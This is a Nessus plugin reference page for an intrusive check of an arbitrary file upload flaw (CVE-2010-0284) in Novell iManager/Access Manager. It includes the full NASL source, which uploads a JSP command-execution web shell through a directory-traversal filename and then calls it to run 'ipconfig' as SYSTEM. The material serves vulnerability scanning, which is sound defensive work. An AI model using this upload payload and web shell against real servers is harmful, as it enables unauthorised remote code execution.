Novell 'modulemanager' Servlet Arbitrary File Upload (intrusive check) - Nessus

Critical   Plugin ID: 47581

This page contains detailed information about the Novell 'modulemanager' Servlet Arbitrary File Upload (intrusive check) Nessus plugin including available exploits and PoCs found on GitHub, in Metasploit or Exploit-DB for verifying of this vulnerability.

Plugin Overview


ID: 47581
Name: Novell 'modulemanager' Servlet Arbitrary File Upload (intrusive check)
Filename: novell_access_manager_file_upload.nasl
Vulnerability Published: 2010-06-10
This Plugin Published: 2010-07-01
Last Modification Time: 2021-01-19
Plugin Version: 1.16
Plugin Type: remote
Plugin Family: CGI abuses
Dependencies: http_version.nasl, os_fingerprint.nasl
Excluded KB Items [?]: Settings/disable_cgi_scanning

Vulnerability Information


Severity: Critical
Vulnerability Published: 2010-06-10
Patch Published: 2010-06-10
CVE [?]: CVE-2010-0284
CPE [?]: N/A

Synopsis

A web application on the remote Windows host has an arbitrary file upload vulnerability.

Description

The Administration Console component of Novell Access Manager or Novell iManager hosted on the remote web server has an arbitrary file upload vulnerability. Sending a specially crafted multipart POST request to '/nps/servlet/modulemanager' results in the upload of arbitrary data. Specifying a destination filename that contains a directory traversal string allows an attacker to write arbitrary files as SYSTEM. Only Windows installs are affected.

A remote attacker could exploit this to upload arbitrary files to the system, resulting in remote code execution.

Solution

Upgrade to Access Manager 3.1 SP2 / iManager 2.7 ftf3 or later.

Public Exploits


Target Network Port(s): 8443
Target Asset(s): Services/www
Exploit Available: True (Metasploit Framework, D2 Elliot)
Exploit Ease: Exploits are available

Here's the list of publicly known exploits and PoCs for verifying the Novell 'modulemanager' Servlet Arbitrary File Upload (intrusive check) vulnerability:

  1. Metasploit: exploit/windows/http/novell_imanager_upload
    [Novell iManager getMultiPartParameters Arbitrary File Upload]
  2. D2 Elliot: novell_imanager_file_upload.html
    [Novell iManager File Upload]

Before running any exploit against any system, make sure you are authorized by the owner of the target system(s) to perform such activity. In any other case, this would be considered as an illegal activity.

Risk Information


CVSS V2 Vector [?]: AV:N/AC:L/Au:N/C:C/I:C/A:C/E:F/RL:OF/RC:C
CVSS Base Score:10.0 (High)
Impact Subscore:10.0
Exploitability Subscore:10.0
CVSS Temporal Score:8.3 (High)
CVSS Environmental Score:NA (None)
Modified Impact Subscore:NA
Overall CVSS Score:8.3 (High)

Go back to menu.

Plugin Source


This is the novell_access_manager_file_upload.nasl nessus plugin source code. This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#


include('deprecated_nasl_level.inc');
include('compat.inc');


if (description)
{
  script_id(47581);
  script_version("1.16");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");

  script_cve_id("CVE-2010-0284");
  script_bugtraq_id(40931, 43635);
  script_xref(name:"Secunia", value:"40198");
  script_xref(name:"Secunia", value:"41687");

  script_name(english:"Novell 'modulemanager' Servlet Arbitrary File Upload (intrusive check)");
  script_summary(english:"Tries to upload and access a JSP file");

  script_set_attribute(
    attribute:"synopsis",
    value:
"A web application on the remote Windows host has an arbitrary file
upload vulnerability."
  );
  script_set_attribute(
    attribute:"description",
    value:
"The Administration Console component of Novell Access Manager or
Novell iManager hosted on the remote web server has an arbitrary
file upload vulnerability.  Sending a specially crafted multipart
POST request to '/nps/servlet/modulemanager' results in the upload
of arbitrary data. Specifying a destination filename that contains
a directory traversal string allows an attacker to write arbitrary
files as SYSTEM.  Only Windows installs are affected.

A remote attacker could exploit this to upload arbitrary files to the
system, resulting in remote code execution."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.zerodayinitiative.com/advisories/ZDI-10-112/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"http://www.nessus.org/u?223e218b"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://www.zerodayinitiative.com/advisories/ZDI-10-190/"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://support.microfocus.com/kb/doc.php?id=7006515"
  );
  script_set_attribute(
    attribute:"solution",
    value:"Upgrade to Access Manager 3.1 SP2 / iManager 2.7 ftf3 or later."
  );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"d2_elliot_name", value:"Novell iManager File Upload");
  script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
 script_set_attribute(attribute:"metasploit_name", value:'Novell iManager getMultiPartParameters Arbitrary File Upload');
 script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
  script_set_attribute(attribute:"vuln_publication_date",value:"2010/06/10");
  script_set_attribute(attribute:"patch_publication_date",value:"2010/06/10");
  script_set_attribute(attribute:"plugin_publication_date", value:"2010/07/01");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_DESTRUCTIVE_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2010-2021 Tenable Network Security, Inc.");

  script_dependencies("os_fingerprint.nasl", "http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 8443);

  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


# Unless we're paranoid, bail out if OS has been determined and is not Windows
if (report_paranoia < 2)
{
  os = get_kb_item('Host/OS');
  if (os && 'Windows' >!< os)
    exit(0, 'Only Windows hosts are affected.');
}

port = get_http_port(default:8443);
url = '/nps/servlet/modulemanager';
  
# The exploit allows us to upload this JSP source which will execute as SYSTEM
cmd = 'ipconfig';
jsp_source = '<%@ page import="java.io.*" %>
<%
Process p = Runtime.getRuntime().exec("'+cmd+'");
String output= "";
String temp = null;
InputStreamReader reader = new InputStreamReader(p.getInputStream());
BufferedReader stdin = new BufferedReader(reader);

while ((temp = stdin.readLine()) != null)
{
  output += temp;
  if (temp.length() > 0) {output += "\\n";}
}
%><%= output %>';

boundary = '--nessus';
filename = SCRIPT_NAME+'-'+rand()+'.jsp';
postdata =
  boundary+'\r\n'+
  'Content-Disposition: form-data; name="filename"; '+
  'filename="../../../../../../Program Files/Novell/Tomcat/webapps/nps/'+filename+'"\r\n'+
  'Content-Type: application/x-java-archive\r\n\r\n'+
  jsp_source+'\r\n';

req = http_mk_post_req(
  item:url,
  port:port,
  content_type:'multipart/form-data; boundary='+boundary,
  data:postdata
);
res = http_send_recv_req(port:port, req:req, exit_on_fail:TRUE);

url = '/nps/'+filename;
res = http_send_recv3(
  method:"GET",
  item:url,
  port:port,
  exit_on_fail:TRUE
);

if ('Windows IP Configuration' >< res[2])
{
  if (report_verbosity > 0)
  {
    report =
      '\n' + "Nessus was able to execute the '" + cmd + "' command by first uploading" +  
      '\na file using the following request :' + 
      '\n' + 
      '\n' + crap(data:"-", length:30) + ' snip ' +  crap(data:"-", length:30) + 
      '\n' + http_mk_buffer_from_req(req:req) + 
      '\n' + crap(data:"-", length:30) + ' snip ' +  crap(data:"-", length:30) + 
      '\n' + 
      '\nand then calling it using the following URL :' + 
      '\n' + 
      '\n  ' + build_url(qs:url, port:port) + '\n';
    if (report_verbosity > 1)
    {
      report +=
        '\nThis produced the following output :\n\n'+
        crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n'+
        res[2]+
        crap(data:"-", length:30)+' snip '+ crap(data:"-", length:30)+'\n';
    }
    security_hole(port:port, extra:report);
  }
  else security_hole(port);
}
else exit(0, 'The server on port '+port+' is not affected.');

The latest version of this script can be found in these locations depending on your platform:

  • Linux / Unix:
    /opt/nessus/lib/nessus/plugins/novell_access_manager_file_upload.nasl
  • Windows:
    C:\ProgramData\Tenable\Nessus\nessus\plugins\novell_access_manager_file_upload.nasl
  • Mac OS X:
    /Library/Nessus/run/lib/nessus/plugins/novell_access_manager_file_upload.nasl

Go back to menu.

How to Run


Here is how to run the Novell 'modulemanager' Servlet Arbitrary File Upload (intrusive check) as a standalone plugin via the Nessus web user interface (https://localhost:8834/):

  1. Click to start a New Scan.
  2. Select Advanced Scan.
  3. Navigate to the Plugins tab.
  4. On the top right corner click to Disable All plugins.
  5. On the left side table select CGI abuses plugin family.
  6. On the right side table select Novell 'modulemanager' Servlet Arbitrary File Upload (intrusive check) plugin ID 47581.
  7. Specify the target on the Settings tab and click to Save the scan.
  8. Run the scan.

Here are a few examples of how to run the plugin in the command line. Note that the examples below demonstrate the usage on the Linux / Unix platform.

Basic usage:

/opt/nessus/bin/nasl novell_access_manager_file_upload.nasl -t <IP/HOST>

Run the plugin with audit trail message on the console:

/opt/nessus/bin/nasl -a novell_access_manager_file_upload.nasl -t <IP/HOST>

Run the plugin with trace script execution written to the console (useful for debugging):

/opt/nessus/bin/nasl -T - novell_access_manager_file_upload.nasl -t <IP/HOST>

Run the plugin with using a state file for the target and updating it (useful for running multiple plugins on the target):

/opt/nessus/bin/nasl -K /tmp/state novell_access_manager_file_upload.nasl -t <IP/HOST>

Go back to menu.

References


BID | SecurityFocus Bugtraq ID: Secunia Advisory: See also: Similar and related Nessus plugins:
  • 47582 - Novell 'modulemanager' Servlet Arbitrary File Upload (safe check)
  • 62968 - Novell Sentinel Log Manager Authentication Bypass
  • 83289 - Novell ZENworks Configuration Management < 11.3.2 Remote Code Execution (intrusive check)
  • 66914 - Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)
  • 65551 - Novell ZENworks Mobile Management MDM.php Local File Inclusion
  • 69557 - Novell Client / Client 2 Multiple Vulnerabilities
  • 53536 - Novell File Reporter Agent XML Tag Handling Buffer Overflow
  • 62977 - Novell File Reporter Agent FSFUI UICMD 126 Arbitrary File Download
  • 62026 - Novell File Reporter Agent XML Parsing Remote Code Execution
  • 55471 - Novell File Reporter Engine RECORD Element Tag Parsing Overflow (credentialed check)
  • 55544 - Novell File Reporter Engine RECORD Element Tag Parsing Overflow (uncredentialed check)
  • 43060 - Novell iPrint Client < 5.32 Multiple Overflows
  • 48364 - Novell iPrint Client < 5.42 Multiple Flaws
  • 48407 - Novell iPrint Client < 5.44 Multiple Vulnerabilities
  • 51367 - Novell iPrint Client < 5.56 Multiple Vulnerabilities
  • 56682 - Novell iPrint Client < 5.72 nipplib.dll GetDriverSettings Function Buffer Overflow
  • 31136 - Novell iPrint Control ActiveX (ienipp.ocx) ExecuteRequest() Method Overflow
  • 34049 - Novell iPrint Client ActiveX Control Multiple Vulnerabilities
  • 33227 - Novell iPrint Client for Windows ienipp.ocx ActiveX Multiple Variable Overflow
  • 36103 - Novell NetIdentity Agent < 1.2.4 Arbitrary Pointer De-reference Code Execution
  • 20318 - Novell NetMail IMAP Agent Long Verb Arguments Remote Overflow
  • 29898 - Novell Client nicm.sys Local Privilege Escalation
  • 33481 - Novell Client nwfs.sys Local Privilege Escalation
  • 25952 - Novell Client nwspool.dll RPC Printer Functions Remote Overflow (300870)
  • 23699 - Novell NetWare Client Print Provider (nwspool.dll) Multiple Function Overflow
  • 65722 - Novell ZENworks Control Center File Upload Remote Code Execution
  • 45569 - Novell ZENworks Configuration Management < 10 SP3 Multiple Flaws
  • 58968 - Novell ZENworks Configuration Management PreBoot Service Opcode Request Parsing Vulnerabilities
  • 22903 - Novell eDirectory iMonitor HTTP Protocol Stack (httpstk) Host HTTP Header Remote Overflow
  • 50690 - Novell GroupWise Document Viewer Agent Arbitrary File Download
  • 50694 - Novell GroupWise WebAccess Arbitrary File Download

Version


This page has been produced using Nessus Professional 10.1.2 (#68) LINUX, Plugin set 202205072148.
Plugin file novell_access_manager_file_upload.nasl version 1.16. For more plugins, visit the Nessus Plugin Library.

Go back to menu.